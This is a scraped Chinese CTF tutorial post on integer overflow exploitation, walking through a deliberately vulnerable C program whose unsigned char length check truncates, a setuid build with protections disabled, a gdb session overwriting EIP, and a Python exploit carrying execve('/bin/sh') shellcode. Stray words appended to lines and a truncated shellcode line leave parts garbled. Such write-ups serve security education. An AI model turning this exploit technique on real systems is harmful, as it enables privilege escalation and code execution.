PWN INTEGER OVERFLOW 整数溢出

时间 2019-11-29

标签 pwn integer overflow 整数溢出繁體版

原文原文链接

0x00 Preview html

　　Last few passage I didn't conclude some important points and a general direction of the learning route of PWN. I browser some passages and finally I found one maybe suitable and reasonable for most PWN lovers:python

0x01 Integer Overflow —— What's ?shell

　　Storing a value greater than maximun supported value is called integer overflow. 可是呢，这个也仅仅是overflow，不能形成代码执行（英文真的写不下去了。。。随心写了。。）。数组

首先咱们来看一下C语言的一些类型的对应的字节大小(摘自CTF WIKI)函数

short int	2byte(word)	0~32767(0~0x7fff) -32768~-1(0x8000~0xffff)
unsigned short int	2byte(word)	0~65535(0~0xffff)
int	4byte(dword)	0~2147483647(0~0x7fffffff) -2147483648~-1(0x80000000~0xffffffff)
unsigned int	4byte(dword)	0~4294967295(0~0xffffffff)
long int	8byte(qword)	正: 0~0x7fffffffffffffff 负: 0x8000000000000000~0xffffffffffffffff
unsigned long int	8byte(qword)	0~0xffffffffffffffff

以后我将CTF wiki上的总结了一下以下：布局

注意：大的范围转给小的范围的数，会形成截断，这是内存分布结构所致使的，下面示例中会讲到ui

0x02 How?url

这里我先拿某位大神的示例，并说出个人观点spa

示例代码：3d

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void store_passwd_indb(char* passwd) {
}

void validate_uname(char* uname) {
}

void validate_passwd(char* passwd) {
 char passwd_buf[11];
 unsigned char passwd_len = strlen(passwd); /* [1] */ 
 if(passwd_len >= 4 && passwd_len <= 8) { /* [2] */
  printf("Valid Password\n"); /* [3] */ 
  fflush(stdout);
  strcpy(passwd_buf,passwd); /* [4] */
 } else {
  printf("Invalid Password\n"); /* [5] */
  fflush(stdout);
 }
 store_passwd_indb(passwd_buf); /* [6] */
}

int main(int argc, char* argv[]) {
 if(argc!=3) {
  printf("Usage Error:   \n");
  fflush(stdout);
  exit(-1);
 }
 validate_uname(argv[1]);
 validate_passwd(argv[2]);
 return 0;
}

去除保护措施编译：

$gcc -g -fno-stack-protector -z execstack -o vuln vuln.c
$sudo chown root vuln
$sudo chgrp root vuln
$sudo chmod +s vuln

咱们先来分析一下代码：

前两个函数没什么问题，第三个函数开始：

传入一个字符串（大小任意）——>定义11大小数组，每一个单位为uchar字节（共11*1byte）

——> 获取密码长度，可是uchar（256）

——> 经过检测则复制密码到数组

——> 不经过则gg

——> 主函数没什么问题

思考：

第一个漏洞点：uchar 的len，由于长度为256，当大于256就会截断，如输入261（‭0001 0000 0101‬），截断后（后uchar字节的数）：5（0101），因此len会变为5

第二个漏洞点：基本的栈溢出，就是复制密码到数组

结合两个漏洞点，由于shellcode通常是40多字节（排除任意长度大神），能存储的地方是buf，passwd，buf长度限制，用来溢出，passwd咱们用来存储shellcode

步骤：

一、整数溢出过检测

二、栈溢出执行代码

0X03 Do the Exp

反编译程序第三个函数：

这是我64位的结果，提供借鉴，可是做者的环境是x86，显示的可能不同，我这里引入某大佬的调试过程：

Reading symbols from vuln...done.
(gdb) b validate_passwd
Breakpoint 1 at 0x804850d: file vuln.c, line 14.
(gdb) r sploitfun `python -c 'print "A"*261'`
Starting program: /home/jourluohua/work/test2/vuln sploitfun `python -c 'print "A"*261'`

Breakpoint 1, validate_passwd (
    passwd=0xbffff6b6 'A' <repeats 200 times>...) at vuln.c:14
14     unsigned char passwd_len = strlen(passwd); /* [1] */ 
(gdb) n　　　　　　　　//单步调试，想看看执行到了咱们认为的关键的代码没有，很明显这儿还不是关键代码
15     if(passwd_len >= 4 && passwd_len <= 8) { /* [2] */
(gdb) n
16      printf("Valid Password\n"); /* [3] */ 
(gdb) p passwd_len　　//这儿是关键处了，可是若是是正确的话，passwd_len 应该是'A',极可能是程序还没真正执行到
$1 = 5 '\005'
(gdb) n
Valid Password
17      fflush(stdout);
(gdb) n
18      strcpy(passwd_buf,passwd); /* [4] */
(gdb) n
23     store_passwd_indb(passwd_buf); /* [6] */
(gdb) p passwd_len　　　　//好终于到了咱们想要的地方了
$2 = 65 'A'
(gdb) p &passwd_len　　　//passwd_len的地址，既然利用的是栈，咱们在意的是内存布局
$3 = (unsigned char *) 0xbffff46f 'A' <repeats 200 times>...
(gdb) p buf　　　　　　　　//手误，没有任何缘由
$4 = 0x0
(gdb) n
24    }
(gdb) p passwd_buf　　　　//passwd_buf的值也对了
$5 = 'A' <repeats 11 times>
(gdb) p &passwd_buf[0]　　//passwd_buf的地址也和咱们想象的同样
$6 = 0xbffff464 'A' <repeats 200 times>...
(gdb) p/x $eip　　　　　　//很明显尚未被覆盖
$7 = 0x8048578
(gdb) p/x $ebp　　　　　　//这个真的不是在凑字数，ebp的地址很重要
$8 = 0xbffff478
(gdb) n
0x41414141 in ?? ()
(gdb) p/x $eip　　　　　　//好，已经覆盖了
$9 = 0x41414141
(gdb) p/x $ebp
$10 = 0x41414141
(gdb)

嗯，差很少能ret咱们输入的shellcode，没错我比较愚笨因此输入了10次26字母加一个字母

堆栈结构什么的我就直接复制粘贴了：

说明一下我我的的观点：

一、 alignment space，对齐空间，即字节对齐，具体看http://www.javashuo.com/article/p-wblxslkw-u.html

这里注意的是，char先定义，因此按char来算，就是在buf[8-11]和len之间填4个字节

二、RET 后面跟EBP以前说过，很少说了

shellcode：

#exp.py 
#!/usr/bin/env python
import struct
from subprocess import call

arg1 = "sploitfun"

#Stack address where shellcode is copied.
ret_addr = 0xbffff4e0

#Spawn a shell
#execve(/bin/sh)
scode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\$

#endianess convertion
def conv(num):
 return struct.pack("<I",num) #chunk + ReturnAdress + NOP's + Shellcode
arg2 = "A" * 24
arg2 += conv(ret_addr);
arg2 += "\x90" * 100
arg2 += scode
arg2 += "C" * 108

print "Calling vulnerable program"
call(["./vuln", arg1, arg2])

1. Pwn-Overflow Free Chunk(堆溢出)
2. PWN栈溢出
3. 整数溢出
4. overflow溢出处理
5. hackme pwn toomuch1 - buffer overflow
6. PWN入门【栈溢出】
7. kernel pwn学习 --栈溢出
8. CTF--pwn（栈溢出漏洞）
9. html元素溢出（overflow）
10. 进位和溢出(Carry & Overflow)
更多相关文章...
• XSL-FO 输出 - XSL-FO 教程
• SVN 检出操作 - SVN 教程
• Flink 数据传输及反压详解
• TiDB 在摩拜单车在线数据业务的应用和实践